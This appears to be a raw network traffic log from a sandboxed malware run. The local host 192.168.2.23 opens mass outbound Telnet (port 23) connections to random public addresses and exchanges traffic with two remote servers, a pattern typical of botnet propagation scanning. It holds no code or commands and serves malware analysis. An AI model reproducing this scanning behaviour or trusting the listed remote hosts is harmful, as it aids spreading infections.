Dec 5, 2024 08:02:49.831897020 CET	59952	23	192.168.2.23	152.47.87.165
Dec 5, 2024 08:02:49.831898928 CET	38612	23	192.168.2.23	183.56.68.202
Dec 5, 2024 08:02:49.831902981 CET	47246	23	192.168.2.23	11.28.221.113
Dec 5, 2024 08:02:49.831918001 CET	46988	23	192.168.2.23	11.186.51.13
Dec 5, 2024 08:02:49.831922054 CET	55610	23	192.168.2.23	93.245.89.62
Dec 5, 2024 08:02:49.831939936 CET	36796	23	192.168.2.23	59.194.179.68
Dec 5, 2024 08:02:49.831954002 CET	60346	23	192.168.2.23	178.158.63.197
Dec 5, 2024 08:02:49.831958055 CET	45918	23	192.168.2.23	194.77.207.106
Dec 5, 2024 08:02:49.831965923 CET	33226	23	192.168.2.23	199.188.249.152
Dec 5, 2024 08:02:49.831989050 CET	55536	23	192.168.2.23	131.217.222.252
Dec 5, 2024 08:02:49.831993103 CET	35880	23	192.168.2.23	108.189.48.62
Dec 5, 2024 08:02:49.832003117 CET	50020	23	192.168.2.23	14.234.225.230
Dec 5, 2024 08:02:49.832010031 CET	42886	23	192.168.2.23	35.200.152.187
Dec 5, 2024 08:02:49.832020044 CET	44718	23	192.168.2.23	144.33.193.131
Dec 5, 2024 08:02:49.832020044 CET	60612	23	192.168.2.23	158.38.111.112
Dec 5, 2024 08:02:49.832029104 CET	41828	23	192.168.2.23	61.210.73.254
Dec 5, 2024 08:02:49.832039118 CET	51512	23	192.168.2.23	179.239.7.19
Dec 5, 2024 08:02:49.832041025 CET	46750	23	192.168.2.23	111.113.16.140
Dec 5, 2024 08:02:49.832063913 CET	43784	23	192.168.2.23	78.107.223.24
Dec 5, 2024 08:02:49.832087994 CET	40298	23	192.168.2.23	106.54.203.113
Dec 5, 2024 08:02:49.832087994 CET	38100	23	192.168.2.23	70.185.114.58
Dec 5, 2024 08:02:49.832087994 CET	54176	23	192.168.2.23	156.60.17.48
Dec 5, 2024 08:02:49.832093954 CET	53560	23	192.168.2.23	115.88.21.255
Dec 5, 2024 08:02:49.832113981 CET	37202	23	192.168.2.23	106.162.255.130
Dec 5, 2024 08:02:49.832133055 CET	45766	23	192.168.2.23	44.232.218.63
Dec 5, 2024 08:02:49.832134008 CET	58068	23	192.168.2.23	126.235.65.123
Dec 5, 2024 08:02:49.869110107 CET	199	38974	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.878530025 CET	199	38976	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.878585100 CET	38976	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.888735056 CET	38976	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.898895979 CET	38976	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.926604033 CET	39380	199	192.168.2.23	154.216.19.139
Dec 5, 2024 08:02:49.939908981 CET	199	38974	154.216.19.139	192.168.2.23
Dec 5, 2024 08:02:49.940036058 CET	38242	60022	94.156.227.234	192.168.2.23
Dec 5, 2024 08:02:49.940095901 CET	60022	38242	192.168.2.23	94.156.227.234
Dec 5, 2024 08:02:49.950280905 CET	23	37096	129.174.103.29	192.168.2.23
Dec 5, 2024 08:02:49.950325012 CET	37096	23	192.168.2.23	129.174.103.29
Dec 5, 2024 08:02:49.950328112 CET	23	49048	212.129.157.204	192.168.2.23
Dec 5, 2024 08:02:49.950340986 CET	23	57540	200.15.44.155	192.168.2.23
Dec 5, 2024 08:02:49.950359106 CET	49048	23	192.168.2.23	212.129.157.204
Dec 5, 2024 08:02:49.950387955 CET	57540	23	192.168.2.23	200.15.44.155
Dec 5, 2024 08:02:49.950402021 CET	23	55896	219.4.115.95	192.168.2.23
Dec 5, 2024 08:02:49.950426102 CET	23	40312	145.223.199.144	192.168.2.23
Dec 5, 2024 08:02:49.950437069 CET	55896	23	192.168.2.23	219.4.115.95
Dec 5, 2024 08:02:49.950443983 CET	23	60714	140.197.190.186	192.168.2.23
Dec 5, 2024 08:02:49.950460911 CET	40312	23	192.168.2.23	145.223.199.144
Dec 5, 2024 08:02:49.950501919 CET	60714	23	192.168.2.23	140.197.190.186
Dec 5, 2024 08:02:49.950536966 CET	23	46120	210.129.200.221	192.168.2.23
Dec 5, 2024 08:02:49.950547934 CET	23	42504	28.135.226.21	192.168.2.23
Dec 5, 2024 08:02:49.950576067 CET	42504	23	192.168.2.23	28.135.226.21
Dec 5, 2024 08:02:49.950582027 CET	46120	23	192.168.2.23	210.129.200.221
Dec 5, 2024 08:02:49.950582981 CET	23	39732	86.95.2.60	192.168.2.23
Dec 5, 2024 08:02:49.950620890 CET	39732	23	192.168.2.23	86.95.2.60
Dec 5, 2024 08:02:49.950630903 CET	23	40856	9.133.96.39	192.168.2.23
Dec 5, 2024 08:02:49.950640917 CET	23	38582	56.113.94.213	192.168.2.23
Dec 5, 2024 08:02:49.950664997 CET	40856	23	192.168.2.23	9.133.96.39
Dec 5, 2024 08:02:49.950669050 CET	38582	23	192.168.2.23	56.113.94.213
Dec 5, 2024 08:02:49.950685978 CET	23	36066	151.249.42.76	192.168.2.23
Dec 5, 2024 08:02:49.950721025 CET	36066	23	192.168.2.23	151.249.42.76
Dec 5, 2024 08:02:49.950722933 CET	23	45338	120.157.94.218	192.168.2.23
Dec 5, 2024 08:02:49.950763941 CET	45338	23	192.168.2.23	120.157.94.218
Dec 5, 2024 08:02:49.951328039 CET	23	43340	26.202.86.167	192.168.2.23
Dec 5, 2024 08:02:49.951363087 CET	43340	23	192.168.2.23	26.202.86.167
Dec 5, 2024 08:02:49.951379061 CET	23	55644	222.202.140.133	192.168.2.23
Dec 5, 2024 08:02:49.951392889 CET	23	45124	70.162.134.108	192.168.2.23
Dec 5, 2024 08:02:49.951402903 CET	23	55540	9.38.169.204	192.168.2.23
Dec 5, 2024 08:02:49.951420069 CET	55644	23	192.168.2.23	222.202.140.133
Dec 5, 2024 08:02:49.951426983 CET	45124	23	192.168.2.23	70.162.134.108
Dec 5, 2024 08:02:49.951457977 CET	55540	23	192.168.2.23	9.38.169.204
Dec 5, 2024 08:02:49.951525927 CET	23	59074	56.201.235.136	192.168.2.23
Dec 5, 2024 08:02:49.951536894 CET	23	45848	58.65.241.107	192.168.2.23
Dec 5, 2024 08:02:49.951551914 CET	23	59380	160.106.164.183	192.168.2.23
Dec 5, 2024 08:02:49.951562881 CET	23	35166	163.206.140.184	192.168.2.23
Dec 5, 2024 08:02:49.951565981 CET	59074	23	192.168.2.23	56.201.235.136
Dec 5, 2024 08:02:49.951570988 CET	45848	23	192.168.2.23	58.65.241.107
Dec 5, 2024 08:02:49.951574087 CET	23	36240	6.94.1.73	192.168.2.23
Dec 5, 2024 08:02:49.951581955 CET	59380	23	192.168.2.23	160.106.164.183
Dec 5, 2024 08:02:49.951585054 CET	23	51414	177.21.18.87	192.168.2.23
Dec 5, 2024 08:02:49.951596975 CET	23	54168	185.29.24.192	192.168.2.23
Dec 5, 2024 08:02:49.951598883 CET	35166	23	192.168.2.23	163.206.140.184
Dec 5, 2024 08:02:49.951608896 CET	23	50296	86.156.177.32	192.168.2.23
Dec 5, 2024 08:02:49.951620102 CET	23	55208	114.208.224.169	192.168.2.23
Dec 5, 2024 08:02:49.951622963 CET	36240	23	192.168.2.23	6.94.1.73
Dec 5, 2024 08:02:49.951622963 CET	51414	23	192.168.2.23	177.21.18.87
Dec 5, 2024 08:02:49.951628923 CET	23	53204	110.60.14.240	192.168.2.23
Dec 5, 2024 08:02:49.951637030 CET	54168	23	192.168.2.23	185.29.24.192
Dec 5, 2024 08:02:49.951644897 CET	55208	23	192.168.2.23	114.208.224.169
Dec 5, 2024 08:02:49.951648951 CET	23	44752	209.149.251.100	192.168.2.23
Dec 5, 2024 08:02:49.951662064 CET	53204	23	192.168.2.23	110.60.14.240
Dec 5, 2024 08:02:49.951663017 CET	50296	23	192.168.2.23	86.156.177.32
Dec 5, 2024 08:02:49.951664925 CET	23	34288	108.68.190.123	192.168.2.23
Dec 5, 2024 08:02:49.951675892 CET	23	34282	200.96.208.141	192.168.2.23
Dec 5, 2024 08:02:49.951679945 CET	44752	23	192.168.2.23	209.149.251.100
Dec 5, 2024 08:02:49.951685905 CET	23	50714	71.118.23.202	192.168.2.23
Dec 5, 2024 08:02:49.951688051 CET	34288	23	192.168.2.23	108.68.190.123
Dec 5, 2024 08:02:49.951697111 CET	23	49234	212.116.154.204	192.168.2.23
Dec 5, 2024 08:02:49.951706886 CET	23	58176	130.214.213.120	192.168.2.23
Dec 5, 2024 08:02:49.951708078 CET	34282	23	192.168.2.23	200.96.208.141
Dec 5, 2024 08:02:49.951708078 CET	50714	23	192.168.2.23	71.118.23.202
Dec 5, 2024 08:02:49.951716900 CET	23	51514	19.241.51.176	192.168.2.23
Dec 5, 2024 08:02:49.951721907 CET	49234	23	192.168.2.23	212.116.154.204
Dec 5, 2024 08:02:49.951726913 CET	23	47404	182.149.182.79	192.168.2.23
Dec 5, 2024 08:02:49.951757908 CET	58176	23	192.168.2.23	130.214.213.120
Dec 5, 2024 08:02:49.951760054 CET	51514	23	192.168.2.23	19.241.51.176
Dec 5, 2024 08:02:49.951766968 CET	47404	23	192.168.2.23	182.149.182.79
Dec 5, 2024 08:02:49.952148914 CET	23	33524	44.154.217.157	192.168.2.23
Dec 5, 2024 08:02:49.952167988 CET	23	48500	121.177.189.157	192.168.2.23
Dec 5, 2024 08:02:49.952179909 CET	23	57312	175.191.68.88	192.168.2.23
Dec 5, 2024 08:02:49.952183008 CET	33524	23	192.168.2.23	44.154.217.157
Dec 5, 2024 08:02:49.952195883 CET	48500	23	192.168.2.23	121.177.189.157
Dec 5, 2024 08:02:49.952208042 CET	57312	23	192.168.2.23	175.191.68.88
Dec 5, 2024 08:02:49.952212095 CET	23	47002	211.218.239.156	192.168.2.23
Dec 5, 2024 08:02:49.952224016 CET	23	32842	116.31.85.121	192.168.2.23
Dec 5, 2024 08:02:49.952246904 CET	47002	23	192.168.2.23	211.218.239.156
Dec 5, 2024 08:02:49.952244043 CET	32842	23	192.168.2.23	116.31.85.121
Dec 5, 2024 08:02:49.952281952 CET	23	52510	12.78.245.231	192.168.2.23
Dec 5, 2024 08:02:49.952291965 CET	23	54562	122.208.231.185	192.168.2.23
Dec 5, 2024 08:02:49.952302933 CET	23	37032	97.30.217.167	192.168.2.23
Dec 5, 2024 08:02:49.952318907 CET	52510	23	192.168.2.23	12.78.245.231
Dec 5, 2024 08:02:49.952322006 CET	54562	23	192.168.2.23	122.208.231.185
Dec 5, 2024 08:02:49.952346087 CET	37032	23	192.168.2.23	97.30.217.167
Dec 5, 2024 08:02:49.952353954 CET	23	60122	139.21.121.102	192.168.2.23
Dec 5, 2024 08:02:49.952366114 CET	23	40084	191.79.127.213	192.168.2.23
Dec 5, 2024 08:02:49.952377081 CET	23	43056	150.61.48.142	192.168.2.23
Dec 5, 2024 08:02:49.952385902 CET	60122	23	192.168.2.23	139.21.121.102
Dec 5, 2024 08:02:49.952402115 CET	23	42596	39.253.242.12	192.168.2.23
Dec 5, 2024 08:02:49.952403069 CET	40084	23	192.168.2.23	191.79.127.213
Dec 5, 2024 08:02:49.952406883 CET	43056	23	192.168.2.23	150.61.48.142
Dec 5, 2024 08:02:49.952414036 CET	23	45244	218.43.149.218	192.168.2.23
Dec 5, 2024 08:02:49.952436924 CET	23	50556	83.94.159.199	192.168.2.23
Dec 5, 2024 08:02:49.952436924 CET	42596	23	192.168.2.23	39.253.242.12
Dec 5, 2024 08:02:49.952444077 CET	45244	23	192.168.2.23	218.43.149.218
Dec 5, 2024 08:02:49.952467918 CET	23	50588	116.126.230.31	192.168.2.23
Dec 5, 2024 08:02:49.952470064 CET	50556	23	192.168.2.23	83.94.159.199
Dec 5, 2024 08:02:49.952507973 CET	50588	23	192.168.2.23	116.126.230.31
Dec 5, 2024 08:02:49.952529907 CET	23	57588	88.241.232.173	192.168.2.23
Dec 5, 2024 08:02:49.952539921 CET	23	51014	73.168.122.219	192.168.2.23
Dec 5, 2024 08:02:49.952548981 CET	23	42516	49.86.94.59	192.168.2.23
Dec 5, 2024 08:02:49.952558994 CET	23	57590	66.111.1.41	192.168.2.23
Dec 5, 2024 08:02:49.952562094 CET	57588	23	192.168.2.23	88.241.232.173
Dec 5, 2024 08:02:49.952584982 CET	42516	23	192.168.2.23	49.86.94.59
Dec 5, 2024 08:02:49.952586889 CET	57590	23	192.168.2.23	66.111.1.41
Dec 5, 2024 08:02:49.952589989 CET	51014	23	192.168.2.23	73.168.122.219
Dec 5, 2024 08:02:49.952688932 CET	23	36354	182.79.105.76	192.168.2.23
Dec 5, 2024 08:02:49.952701092 CET	23	57890	138.153.76.148	192.168.2.23
Dec 5, 2024 08:02:49.952709913 CET	23	41122	22.51.246.174	192.168.2.23
Dec 5, 2024 08:02:49.952729940 CET	57890	23	192.168.2.23	138.153.76.148
Dec 5, 2024 08:02:49.952732086 CET	36354	23	192.168.2.23	182.79.105.76
Dec 5, 2024 08:02:49.952734947 CET	41122	23	192.168.2.23	22.51.246.174
Dec 5, 2024 08:02:49.953083992 CET	23	37058	126.178.131.206	192.168.2.23
Dec 5, 2024 08:02:49.953097105 CET	23	58400	135.104.249.188	192.168.2.23
Dec 5, 2024 08:02:49.953120947 CET	37058	23	192.168.2.23	126.178.131.206
Dec 5, 2024 08:02:49.953125000 CET	23	53904	21.160.33.184	192.168.2.23
Dec 5, 2024 08:02:49.953125954 CET	58400	23	192.168.2.23	135.104.249.188
Dec 5, 2024 08:02:49.953136921 CET	23	59248	187.103.242.245	192.168.2.23
Dec 5, 2024 08:02:49.953155041 CET	23	54352	88.204.146.7	192.168.2.23
Dec 5, 2024 08:02:49.953162909 CET	53904	23	192.168.2.23	21.160.33.184
Dec 5, 2024 08:02:49.953171968 CET	59248	23	192.168.2.23	187.103.242.245
Dec 5, 2024 08:02:49.953190088 CET	23	48872	119.20.76.243	192.168.2.23
Dec 5, 2024 08:02:49.953191996 CET	54352	23	192.168.2.23	88.204.146.7
Dec 5, 2024 08:02:49.953222036 CET	48872	23	192.168.2.23	119.20.76.243
Dec 5, 2024 08:02:49.953243971 CET	23	56594	116.24.104.134	192.168.2.23
Dec 5, 2024 08:02:49.953255892 CET	23	37086	58.10.75.114	192.168.2.23
Dec 5, 2024 08:02:49.953264952 CET	23	41856	219.235.6.49	192.168.2.23
Dec 5, 2024 08:02:49.953273058 CET	56594	23	192.168.2.23	116.24.104.134
Dec 5, 2024 08:02:49.953282118 CET	37086	23	192.168.2.23	58.10.75.114
Dec 5, 2024 08:02:49.953284979 CET	41856	23	192.168.2.23	219.235.6.49
Dec 5, 2024 08:02:49.953330040 CET	23	47540	196.208.109.239	192.168.2.23
Dec 5, 2024 08:02:49.953340054 CET	23	39566	86.3.196.5	192.168.2.23
Dec 5, 2024 08:02:49.953351021 CET	23	43748	86.188.53.172	192.168.2.23
Dec 5, 2024 08:02:49.953365088 CET	47540	23	192.168.2.23	196.208.109.239
Dec 5, 2024 08:02:49.953368902 CET	23	39968	159.32.231.50	192.168.2.23
Dec 5, 2024 08:02:49.953377962 CET	43748	23	192.168.2.23	86.188.53.172
Dec 5, 2024 08:02:49.953380108 CET	39566	23	192.168.2.23	86.3.196.5
Dec 5, 2024 08:02:49.953380108 CET	23	35666	41.244.104.33	192.168.2.23
Dec 5, 2024 08:02:49.953397036 CET	39968	23	192.168.2.23	159.32.231.50
Dec 5, 2024 08:02:49.953413963 CET	35666	23	192.168.2.23	41.244.104.33
Dec 5, 2024 08:02:49.953413963 CET	23	35570	101.75.160.223	192.168.2.23
Dec 5, 2024 08:02:49.953424931 CET	23	41092	186.8.160.224	192.168.2.23
Dec 5, 2024 08:02:49.953435898 CET	23	51710	157.246.109.62	192.168.2.23
Dec 5, 2024 08:02:49.953453064 CET	35570	23	192.168.2.23	101.75.160.223
Dec 5, 2024 08:02:49.953458071 CET	41092	23	192.168.2.23	186.8.160.224
Dec 5, 2024 08:02:49.953471899 CET	51710	23	192.168.2.23	157.246.109.62
Dec 5, 2024 08:02:49.953490973 CET	23	45810	88.11.252.160	192.168.2.23
Dec 5, 2024 08:02:49.953505993 CET	23	56200	48.155.61.30	192.168.2.23
Dec 5, 2024 08:02:49.953516006 CET	23	59794	219.82.58.82	192.168.2.23
Dec 5, 2024 08:02:49.953541040 CET	56200	23	192.168.2.23	48.155.61.30
Dec 5, 2024 08:02:49.953541040 CET	59794	23	192.168.2.23	219.82.58.82
Dec 5, 2024 08:02:49.953555107 CET	45810	23	192.168.2.23	88.11.252.160
Dec 5, 2024 08:02:49.953613043 CET	23	37848	26.127.145.209	192.168.2.23
Dec 5, 2024 08:02:49.953632116 CET	23	37800	192.81.84.23	192.168.2.23
Dec 5, 2024 08:02:49.953658104 CET	37800	23	192.168.2.23	192.81.84.23
Dec 5, 2024 08:02:49.953660965 CET	37848	23	192.168.2.23	26.127.145.209
Dec 5, 2024 08:02:49.954027891 CET	23	58256	64.197.192.50	192.168.2.23
Dec 5, 2024 08:02:49.954047918 CET	23	48822	139.157.203.71	192.168.2.23
Dec 5, 2024 08:02:49.954071999 CET	58256	23	192.168.2.23	64.197.192.50
Dec 5, 2024 08:02:49.954087019 CET	48822	23	192.168.2.23	139.157.203.71
Dec 5, 2024 08:02:49.954099894 CET	23	57088	68.217.38.17	192.168.2.23
Dec 5, 2024 08:02:49.954109907 CET	23	39788	53.156.2.56	192.168.2.23
Dec 5, 2024 08:02:49.954121113 CET	23	52024	11.126.189.65	192.168.2.23
Dec 5, 2024 08:02:49.954133034 CET	23	54296	208.14.132.76	192.168.2.23
Dec 5, 2024 08:02:49.954134941 CET	57088	23	192.168.2.23	68.217.38.17
Dec 5, 2024 08:02:49.954138041 CET	39788	23	192.168.2.23	53.156.2.56
Dec 5, 2024 08:02:49.954161882 CET	52024	23	192.168.2.23	11.126.189.65
Dec 5, 2024 08:02:49.954165936 CET	54296	23	192.168.2.23	208.14.132.76
Dec 5, 2024 08:02:49.954185963 CET	23	40124	154.194.52.21	192.168.2.23
Dec 5, 2024 08:02:49.954196930 CET	23	40092	49.144.37.64	192.168.2.23
Dec 5, 2024 08:02:49.954230070 CET	40124	23	192.168.2.23	154.194.52.21
Dec 5, 2024 08:02:49.954230070 CET	40092	23	192.168.2.23	49.144.37.64
Dec 5, 2024 08:02:49.954231977 CET	23	41592	32.135.216.72	192.168.2.23
Dec 5, 2024 08:02:49.954243898 CET	23	52456	215.136.166.39	192.168.2.23
Dec 5, 2024 08:02:49.954268932 CET	52456	23	192.168.2.23	215.136.166.39
Dec 5, 2024 08:02:49.954271078 CET	23	37176	36.163.114.52	192.168.2.23
Dec 5, 2024 08:02:49.954273939 CET	41592	23	192.168.2.23	32.135.216.72
Dec 5, 2024 08:02:49.954283953 CET	23	59530	131.255.253.249	192.168.2.23
Dec 5, 2024 08:02:49.954296112 CET	23	50590	56.140.154.121	192.168.2.23
Dec 5, 2024 08:02:49.954308987 CET	37176	23	192.168.2.23	36.163.114.52
Dec 5, 2024 08:02:49.954324961 CET	50590	23	192.168.2.23	56.140.154.121
Dec 5, 2024 08:02:49.954339027 CET	59530	23	192.168.2.23	131.255.253.249
Dec 5, 2024 08:02:49.954344988 CET	23	46122	189.255.81.119	192.168.2.23
Dec 5, 2024 08:02:49.954355955 CET	23	50762	144.168.24.148	192.168.2.23
Dec 5, 2024 08:02:49.954365015 CET	23	48010	36.82.145.157	192.168.2.23
Dec 5, 2024 08:02:49.954376936 CET	23	35950	217.250.67.26	192.168.2.23
Dec 5, 2024 08:02:49.954386950 CET	23	55280	166.153.125.255	192.168.2.23
Dec 5, 2024 08:02:49.954396009 CET	50762	23	192.168.2.23	144.168.24.148
Dec 5, 2024 08:02:49.954415083 CET	48010	23	192.168.2.23	36.82.145.157
Dec 5, 2024 08:02:49.954416990 CET	46122	23	192.168.2.23	189.255.81.119
Dec 5, 2024 08:02:49.954431057 CET	35950	23	192.168.2.23	217.250.67.26
Dec 5, 2024 08:02:49.954431057 CET	55280	23	192.168.2.23	166.153.125.255
Dec 5, 2024 08:02:49.954524040 CET	23	47682	121.145.192.109	192.168.2.23
Dec 5, 2024 08:02:49.954535007 CET	23	44992	78.79.41.122	192.168.2.23
Dec 5, 2024 08:02:49.954545021 CET	23	37158	18.10.246.197	192.168.2.23
Dec 5, 2024 08:02:49.954551935 CET	47682	23	192.168.2.23	121.145.192.109
Dec 5, 2024 08:02:49.954555988 CET	23	36218	37.65.113.12	192.168.2.23
Dec 5, 2024 08:02:49.954576969 CET	37158	23	192.168.2.23	18.10.246.197
Dec 5, 2024 08:02:49.954576969 CET	44992	23	192.168.2.23	78.79.41.122
Dec 5, 2024 08:02:49.954595089 CET	36218	23	192.168.2.23	37.65.113.12
Dec 5, 2024 08:02:49.954972982 CET	23	39548	46.250.181.70	192.168.2.23
Dec 5, 2024 08:02:49.954992056 CET	23	56588	61.233.196.40	192.168.2.23
Dec 5, 2024 08:02:49.955008030 CET	39548	23	192.168.2.23	46.250.181.70
Dec 5, 2024 08:02:49.955020905 CET	56588	23	192.168.2.23	61.233.196.40
Dec 5, 2024 08:02:49.955039978 CET	23	39872	27.123.203.123	192.168.2.23
Dec 5, 2024 08:02:49.955070972 CET	39872	23	192.168.2.23	27.123.203.123
Dec 5, 2024 08:02:49.955071926 CET	23	40862	147.201.255.206	192.168.2.23
Dec 5, 2024 08:02:49.955085039 CET	23	44812	113.177.123.244	192.168.2.23
Dec 5, 2024 08:02:49.955101967 CET	40862	23	192.168.2.23	147.201.255.206
Dec 5, 2024 08:02:49.955142021 CET	44812	23	192.168.2.23	113.177.123.244
Dec 5, 2024 08:02:49.955178022 CET	23	57400	138.226.170.110	192.168.2.23
Dec 5, 2024 08:02:49.955188990 CET	23	47606	80.205.19.197	192.168.2.23
Dec 5, 2024 08:02:49.955233097 CET	47606	23	192.168.2.23	80.205.19.197
Dec 5, 2024 08:02:49.955234051 CET	57400	23	192.168.2.23	138.226.170.110
Dec 5, 2024 08:02:49.955235004 CET	23	36698	19.1.248.192	192.168.2.23
Dec 5, 2024 08:02:49.955246925 CET	23	39544	54.208.207.93	192.168.2.23
Dec 5, 2024 08:02:49.955265999 CET	23	53782	111.15.95.101	192.168.2.23
Dec 5, 2024 08:02:49.955271006 CET	36698	23	192.168.2.23	19.1.248.192
Dec 5, 2024 08:02:49.955272913 CET	39544	23	192.168.2.23	54.208.207.93
Dec 5, 2024 08:02:49.955276012 CET	23	49418	49.52.200.230	192.168.2.23
Dec 5, 2024 08:02:49.955291986 CET	53782	23	192.168.2.23	111.15.95.101
Dec 5, 2024 08:02:49.955300093 CET	23	40326	193.8.57.105	192.168.2.23
Dec 5, 2024 08:02:49.955305099 CET	49418	23	192.168.2.23	49.52.200.230
Dec 5, 2024 08:02:49.955346107 CET	40326	23	192.168.2.23	193.8.57.105
Dec 5, 2024 08:02:49.955379009 CET	23	58298	114.232.54.239	192.168.2.23
Dec 5, 2024 08:02:49.955389977 CET	23	50738	107.248.86.231	192.168.2.23
Dec 5, 2024 08:02:49.955399990 CET	23	35464	29.249.30.124	192.168.2.23
Dec 5, 2024 08:02:49.955418110 CET	58298	23	192.168.2.23	114.232.54.239
Dec 5, 2024 08:02:49.955418110 CET	50738	23	192.168.2.23	107.248.86.231
Dec 5, 2024 08:02:49.955421925 CET	23	56422	164.237.248.89	192.168.2.23
Dec 5, 2024 08:02:49.955430984 CET	35464	23	192.168.2.23	29.249.30.124
Dec 5, 2024 08:02:49.955435038 CET	23	40174	108.130.142.170	192.168.2.23
Dec 5, 2024 08:02:49.955451012 CET	23	38172	92.61.78.162	192.168.2.23
Dec 5, 2024 08:02:49.955456018 CET	56422	23	192.168.2.23	164.237.248.89
Dec 5, 2024 08:02:49.955471039 CET	40174	23	192.168.2.23	108.130.142.170
Dec 5, 2024 08:02:49.955475092 CET	23	41448	198.5.158.151	192.168.2.23
Dec 5, 2024 08:02:49.955486059 CET	23	58672	16.90.195.142	192.168.2.23
Dec 5, 2024 08:02:49.955502987 CET	38172	23	192.168.2.23	92.61.78.162
Dec 5, 2024 08:02:49.955513954 CET	41448	23	192.168.2.23	198.5.158.151
Dec 5, 2024 08:02:49.955518007 CET	58672	23	192.168.2.23	16.90.195.142
Dec 5, 2024 08:02:49.955579042 CET	23	34044	105.111.169.139	192.168.2.23
Dec 5, 2024 08:02:49.955593109 CET	23	58884	65.241.23.79	192.168.2.23
Dec 5, 2024 08:02:49.955616951 CET	34044	23	192.168.2.23	105.111.169.139
Dec 5, 2024 08:02:49.955638885 CET	58884	23	192.168.2.23	65.241.23.79
Dec 5, 2024 08:02:49.956088066 CET	23	36100	107.7.192.212	192.168.2.23
Dec 5, 2024 08:02:49.956098080 CET	23	42294	164.131.85.26	192.168.2.23
Dec 5, 2024 08:02:49.956115007 CET	23	54948	97.99.188.128	192.168.2.23
Dec 5, 2024 08:02:49.956125975 CET	23	55470	168.212.74.188	192.168.2.23
Dec 5, 2024 08:02:49.956127882 CET	36100	23	192.168.2.23	107.7.192.212
Dec 5, 2024 08:02:49.956137896 CET	23	55000	46.205.168.229	192.168.2.23
Dec 5, 2024 08:02:49.956140041 CET	42294	23	192.168.2.23	164.131.85.26
Dec 5, 2024 08:02:49.956146955 CET	54948	23	192.168.2.23	97.99.188.128
Dec 5, 2024 08:02:49.956159115 CET	55470	23	192.168.2.23	168.212.74.188
Dec 5, 2024 08:02:49.956163883 CET	55000	23	192.168.2.23	46.205.168.229
Dec 5, 2024 08:02:49.956219912 CET	23	46506	68.117.139.38	192.168.2.23
Dec 5, 2024 08:02:49.956231117 CET	23	60404	102.20.168.0	192.168.2.23
Dec 5, 2024 08:02:49.956250906 CET	46506	23	192.168.2.23	68.117.139.38
Dec 5, 2024 08:02:49.956252098 CET	23	40766	149.212.228.32	192.168.2.23
Dec 5, 2024 08:02:49.956263065 CET	60404	23	192.168.2.23	102.20.168.0
Dec 5, 2024 08:02:49.956293106 CET	40766	23	192.168.2.23	149.212.228.32
Dec 5, 2024 08:02:49.956295013 CET	23	53524	188.164.69.107	192.168.2.23
Dec 5, 2024 08:02:49.956305981 CET	23	35740	177.167.178.56	192.168.2.23
Dec 5, 2024 08:02:49.956327915 CET	53524	23	192.168.2.23	188.164.69.107
Dec 5, 2024 08:02:49.956331015 CET	35740	23	192.168.2.23	177.167.178.56
Dec 5, 2024 08:02:49.956386089 CET	23	38912	159.19.209.164	192.168.2.23
Dec 5, 2024 08:02:49.956397057 CET	23	40312	18.64.241.39	192.168.2.23
Dec 5, 2024 08:02:49.956407070 CET	23	53852	106.200.173.19	192.168.2.23
Dec 5, 2024 08:02:49.956417084 CET	38912	23	192.168.2.23	159.19.209.164
Dec 5, 2024 08:02:49.956418991 CET	23	48148	29.113.94.55	192.168.2.23
Dec 5, 2024 08:02:49.956427097 CET	40312	23	192.168.2.23	18.64.241.39
Dec 5, 2024 08:02:49.956438065 CET	23	37902	174.88.124.185	192.168.2.23
Dec 5, 2024 08:02:49.956438065 CET	53852	23	192.168.2.23	106.200.173.19
Dec 5, 2024 08:02:49.956449986 CET	23	38496	140.35.152.3	192.168.2.23
Dec 5, 2024 08:02:49.956465006 CET	23	35000	163.112.139.45	192.168.2.23
Dec 5, 2024 08:02:49.956468105 CET	48148	23	192.168.2.23	29.113.94.55
Dec 5, 2024 08:02:49.956470013 CET	37902	23	192.168.2.23	174.88.124.185
Dec 5, 2024 08:02:49.956475019 CET	38496	23	192.168.2.23	140.35.152.3
Dec 5, 2024 08:02:49.956475973 CET	23	56338	48.48.234.153	192.168.2.23
Dec 5, 2024 08:02:49.956496954 CET	35000	23	192.168.2.23	163.112.139.45
Dec 5, 2024 08:02:49.956540108 CET	56338	23	192.168.2.23	48.48.234.153
Dec 5, 2024 08:02:49.956559896 CET	23	46872	78.203.215.202	192.168.2.23
Dec 5, 2024 08:02:49.956571102 CET	23	60422	128.25.97.132	192.168.2.23
Dec 5, 2024 08:02:49.956583023 CET	23	38230	79.101.112.237	192.168.2.23
Dec 5, 2024 08:02:49.956588030 CET	46872	23	192.168.2.23	78.203.215.202
Dec 5, 2024 08:02:49.956600904 CET	23	57422	45.71.25.54	192.168.2.23
Dec 5, 2024 08:02:49.956602097 CET	60422	23	192.168.2.23	128.25.97.132
Dec 5, 2024 08:02:49.956621885 CET	38230	23	192.168.2.23	79.101.112.237
Dec 5, 2024 08:02:49.956655979 CET	57422	23	192.168.2.23	45.71.25.54
Dec 5, 2024 08:02:49.957015038 CET	23	44828	26.38.126.244	192.168.2.23
Dec 5, 2024 08:02:49.957032919 CET	23	57666	151.114.66.86	192.168.2.23
Dec 5, 2024 08:02:49.957043886 CET	23	41804	57.159.205.203	192.168.2.23
Dec 5, 2024 08:02:49.957053900 CET	44828	23	192.168.2.23	26.38.126.244
Dec 5, 2024 08:02:49.957068920 CET	57666	23	192.168.2.23	151.114.66.86
Dec 5, 2024 08:02:49.957072020 CET	23	35010	76.14.39.41	192.168.2.23
Dec 5, 2024 08:02:49.957089901 CET	41804	23	192.168.2.23	57.159.205.203
Dec 5, 2024 08:02:49.957106113 CET	35010	23	192.168.2.23	76.14.39.41
Dec 5, 2024 08:02:49.957124949 CET	23	60088	5.18.62.230	192.168.2.23
Dec 5, 2024 08:02:49.957138062 CET	23	52906	35.110.47.19	192.168.2.23
Dec 5, 2024 08:02:49.957161903 CET	60088	23	192.168.2.23	5.18.62.230
Dec 5, 2024 08:02:49.957171917 CET	52906	23	192.168.2.23	35.110.47.19
Dec 5, 2024 08:02:49.957195997 CET	23	46082	211.200.199.151	192.168.2.23
Dec 5, 2024 08:02:49.957206011 CET	23	58544	1.126.222.164	192.168.2.23
Dec 5, 2024 08:02:49.957218885 CET	23	52390	172.175.32.64	192.168.2.23
